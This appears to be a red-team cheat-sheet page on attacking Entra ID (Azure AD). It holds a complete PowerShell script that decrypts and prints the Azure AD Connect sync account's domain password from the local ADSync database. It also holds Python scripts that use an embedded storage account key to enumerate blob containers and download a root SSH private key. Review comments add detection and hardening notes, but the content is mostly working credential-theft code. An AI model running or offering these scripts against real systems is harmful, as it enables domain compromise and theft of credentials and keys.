# Entra ID (Azure AD)

* If you are a member of the `Azure Admins` group:

```powershell
## ------------------| Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## ------------------| Methodology 
# Purpose: reads the AD connector account that Azure AD Connect sync keeps in
# its local ADSync database and decrypts the stored password with the
# product's own key manager, then prints domain, user name and password.
# The connection string targets localhost with Windows integrated
# authentication, so the query runs under the caller's current logon.
# NOTE(review): nothing below checks group membership; what gates this is SQL
# access to the ADSync catalog and access to the key set. Defensive takeaway
# (confirm per environment): treat the sync server as a top-tier asset and
# keep interactive and remote logon rights to it as small as possible.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
# First query: the three values later passed to LoadKeySet
# (keyset_id read as Int32, instance_id and entropy read as GUIDs).
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
# Advance to the first row; the boolean result is discarded, so an empty
# result set is not detected here.
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Second query: the AD management agent's configuration XML (read as plain
# text) and its encrypted configuration (read as a string).
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Load the sync product's crypto assembly from its install directory.
# NOTE(review): mcrypt.dll being loaded by an interactive PowerShell process,
# or the ADSync catalog being queried by a non-service account, looks like a
# useful detection signal — confirm against local telemetry before alerting.
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
# The key set is selected with the values read from mms_server_configuration.
$km.LoadKeySet($entropy, $instance_id, $key_id)
# [ref] arguments are out-parameters. $key is fetched but never used below;
# the decryption goes through $key2.
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
# encrypted_configuration is treated as Base64 text and decrypted to a string,
# which is parsed as XML further down.
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Domain and user name come from the unencrypted configuration XML; the
# password is the inner text of the //attribute node(s) of the decrypted XML.
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

# The recovered values are written to the host in cleartext, so any console
# transcript of this session contains the secret. If this output appears in
# logs during an investigation, assume the connector account is compromised
# and rotate its password.
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
```

* Azure Storage Development (Microsoft Azure Storage Explorer)

```bash
pip install azure.storage.blob

## Copy the key file /var/backups/key

from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient

# Connection string for the Azure Storage Emulator: all three endpoints are
# plain-http loopback addresses (127.0.0.1).
# NOTE(review): the string embeds the storage account key, and whoever holds
# it has shared-key access to the account. Outside a local emulator, keep it
# out of source and rotate the key once it has been exposed.
connect_str = 'DefaultEndpointsProtocol=http;AccountName=jennifer;AccountKey=FMinPqwWMtEmmPt2ZJGaU5MVXbKBtaFyqP0Zjohpoh39Bd5Q8vQUjztVfFphk73+I+HCUvNY23lUabd7Fm8zgQ==;BlobEndpoint=http://127.0.0.1:10000/jennifer;QueueEndpoint=http://127.0.0.1:10001/jennifer;TableEndpoint=http://127.0.0.1:10002/jennifer;'

try:
    # Service-level client built from the connection string, pinned to
    # service API version 2020-06-12.
    blob_service_client = BlobServiceClient.from_connection_string(
        connect_str,
        api_version='2020-06-12',
    )

    # Print each container name, then the names of its blobs indented by a tab.
    for entry in blob_service_client.list_containers():
        container_name = entry['name']
        print(container_name)
        per_container = blob_service_client.get_container_client(container_name)
        for item in per_container.list_blobs():
            print("\t" + item.name)

except Exception as ex:
    # Any SDK or network failure is reported on stdout, not raised.
    print('Exception:')
    print(ex)



from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, __version__

# Same emulator connection string as the listing script: loopback http
# endpoints with the account key embedded.
# NOTE(review): treat the key as a secret; it gives shared-key access to
# every container in the account.
connect_str = 'DefaultEndpointsProtocol=http;AccountName=jennifer;AccountKey=FMinPqwWMtEmmPt2ZJGaU5MVXbKBtaFyqP0Zjohpoh39Bd5Q8vQUjztVfFphk73+I+HCUvNY23lUabd7Fm8zgQ==;BlobEndpoint=http://127.0.0.1:10000/jennifer;QueueEndpoint=http://127.0.0.1:10001/jennifer;TableEndpoint=http://127.0.0.1:10002/jennifer;'

try:
    blob_service_client = BlobServiceClient.from_connection_string(
        connect_str,
        api_version='2020-06-12',
    )

    # Fetch blob 'root.key' from container 'ssh-keys' and write its bytes to
    # ./root.key. The local file is opened before the download starts.
    # NOTE(review): presumably an SSH private key. Key material kept in a blob
    # container is only as safe as the account key, so it belongs in a secret
    # store, and the key pair should be replaced once it has been read this way.
    key_blob = blob_service_client.get_blob_client(container='ssh-keys', blob='root.key')
    with open('./root.key', "wb") as out_file:
        payload = key_blob.download_blob().readall()
        out_file.write(payload)

except Exception as ex:
    # Any SDK, network or file failure is reported on stdout, not raised.
    print('Exception:')
    print(ex)
```


